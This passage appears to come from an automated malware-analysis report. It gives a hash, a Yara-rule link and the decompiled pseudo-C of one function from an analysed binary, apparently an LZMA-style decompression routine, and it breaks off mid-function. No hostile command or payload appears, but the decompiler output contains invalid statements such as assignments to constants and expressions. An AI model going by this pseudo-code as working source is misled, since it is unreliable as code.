                  • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406682 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406682() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
